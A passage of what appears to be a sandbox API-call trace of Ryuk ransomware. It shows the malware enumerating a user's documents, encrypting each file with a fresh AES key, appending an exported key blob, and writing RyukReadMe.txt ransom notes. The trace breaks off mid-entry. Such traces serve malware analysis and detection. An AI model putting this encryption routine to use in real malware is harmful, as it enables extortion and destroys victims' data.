lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0152.826] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.826] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0152.826] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.826] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.826] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xddfd, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xddfd, lpOverlapped=0x0) returned 1 [0152.827] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0152.827] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xddfd, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xde00) returned 1 [0152.828] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.828] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xde00, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xde00, lpOverlapped=0x0) returned 1 [0152.828] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0152.828] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0152.828] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0152.828] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0152.828] CloseHandle (hObject=0x18c) returned 1 [0152.846] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.850] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.850] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.850] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0152.850] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.851] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\6ijFJ-N0QbIo.odt", dwFileAttributes=0x80) returned 1 [0152.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\6ijFJ-N0QbIo.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\6ijfj-n0qbio.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0152.851] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=30557) returned 1 [0152.851] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=30557) returned 1 [0152.851] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x763b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.851] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0152.852] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.852] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0152.852] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.852] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.852] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x775d, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x775d, lpOverlapped=0x0) returned 1 [0152.853] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0152.853] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x775d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x7760) returned 1 [0152.853] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.853] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7760, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x7760, lpOverlapped=0x0) returned 1 [0152.853] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0152.853] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0152.853] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0152.853] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0152.853] CloseHandle (hObject=0x18c) returned 1 [0152.908] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.913] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.913] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.913] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0152.913] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.913] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\l1I8p3XNlbdKts.docx", dwFileAttributes=0x80) returned 1 [0152.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\l1I8p3XNlbdKts.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\l1i8p3xnlbdkts.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0152.913] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=3156) returned 1 [0152.914] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=3156) returned 1 [0152.914] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xb32, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.914] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0152.914] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.914] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0152.914] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.914] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.914] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xc54, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xc54, lpOverlapped=0x0) returned 1 [0152.915] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0152.915] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xc54, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xc60) returned 1 [0152.915] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.915] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xc60, lpOverlapped=0x0) returned 1 [0152.915] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0152.915] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0152.915] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0152.915] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0152.915] CloseHandle (hObject=0x18c) returned 1 [0152.934] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.938] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.938] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.938] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0152.938] SetLastError (dwErrCode=0x0) [0152.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0152.939] GetLastError () returned 0x0 [0152.939] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0152.939] CloseHandle (hObject=0x18c) returned 1 [0152.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0152.940] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0152.940] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0152.940] SetLastError (dwErrCode=0x0) [0152.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0152.940] GetLastError () returned 0x0 [0152.940] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0152.941] CloseHandle (hObject=0x190) returned 1 [0152.941] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\cvEFXzrwu0\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0152.942] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0152.942] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0152.942] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.942] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\cvEFXzrwu0\\LhvXaB_i.ods", dwFileAttributes=0x80) returned 1 [0152.942] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\cvEFXzrwu0\\LhvXaB_i.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\cvefxzrwu0\\lhvxab_i.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0152.943] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=50322) returned 1 [0152.943] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=50322) returned 1 [0152.943] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xc370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.943] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0152.943] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.943] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0152.943] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.943] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.944] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0xc492, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xc492, lpOverlapped=0x0) returned 1 [0152.944] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0152.944] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xc492, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xc4a0) returned 1 [0152.945] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.945] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc4a0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xc4a0, lpOverlapped=0x0) returned 1 [0152.945] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0152.945] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0152.945] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0152.945] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0152.945] CloseHandle (hObject=0x194) returned 1 [0152.961] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.965] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.965] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.965] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0152.965] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.966] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\cvEFXzrwu0\\t_SBckfMYk- ICD.rtf", dwFileAttributes=0x80) returned 1 [0152.966] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\cvEFXzrwu0\\t_SBckfMYk- ICD.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\cvefxzrwu0\\t_sbckfmyk- icd.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0152.966] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=61536) returned 1 [0152.966] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=61536) returned 1 [0152.966] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xef3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.966] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0152.967] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.967] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0152.967] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.968] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.968] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf060, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xf060, lpOverlapped=0x0) returned 1 [0152.969] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0152.969] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xf060, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xf070) returned 1 [0152.969] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.969] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf070, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xf070, lpOverlapped=0x0) returned 1 [0152.970] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0152.970] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0152.970] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0152.970] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0152.970] CloseHandle (hObject=0x194) returned 1 [0153.002] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.053] CryptDestroyKey (hKey=0x3b8690) returned 1 [0153.053] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0153.053] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0153.053] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0153.053] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\cvEFXzrwu0\\v8 lGEdy7wVI4yiZ.pps", dwFileAttributes=0x80) returned 1 [0153.053] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\cvEFXzrwu0\\v8 lGEdy7wVI4yiZ.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\cvefxzrwu0\\v8 lgedy7wvi4yiz.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0153.054] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=65106) returned 1 [0153.054] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=65106) returned 1 [0153.054] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xfd30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.054] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0153.054] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.054] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0153.054] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 